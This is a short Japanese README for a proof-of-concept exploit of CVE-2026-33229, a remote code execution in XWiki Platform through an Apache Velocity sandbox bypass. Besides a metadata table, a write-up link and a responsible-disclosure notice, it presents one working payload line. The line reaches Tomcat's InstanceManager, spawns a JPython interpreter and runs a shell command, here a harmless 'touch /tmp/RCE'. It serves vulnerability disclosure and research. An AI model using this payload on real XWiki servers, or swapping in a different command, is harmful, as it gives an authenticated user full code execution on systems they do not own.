
# CVE-2026-33229の概念実証エクスプロイト Apache VelocityサンドボックスバイパスによるXWiki RCE(リモートコード実行)の概念実証エクスプロイト。技術的な詳細と動作するペイロードを含みます。
XWiki Platform におけるリモートコード実行の脆弱性です。スクリプト権限を持つ認証済みユーザーが、Velocity コンテキスト内に既に存在する事前インスタンス化されたオブジェクトを走査することで、Java Reflection を一切必要とせずに Apache Velocity サンドボックスを完全に回避できます。
📄 完全な技術詳細: youssefazefzaf.com/posts/cve
| フィールド | 値 |
|---|
| CVE ID | CVE-2026-33229 |
| 影響を受ける製品 | XWiki Platform |
| コンポーネント | Velocity マクロレンダラー、ページタイトルパラメータ |
| 必要な権限 | 認証済み + スクリプト権限 |
| 影響 | リモートコード実行 |
| GHSA | GHSA-h259-74h5-4rh9 |
| 発見日 | 2025年11月7日 |
| パッチ適用日 | 2025年12月10日 |
| 公開日 | 2026年4月8日 |
$request.request.getServletContext().getAttribute("org.apache.tomcat.InstanceManager").newInstance("org.apache.batik.script.jpython.JPythonInterpreter").evaluate("import os; os.system('touch /tmp/RCE')")
責任ある開示に関する通知: PoC はパッチ公開後に公開されています。 所有していないシステムに対して使用しないでください。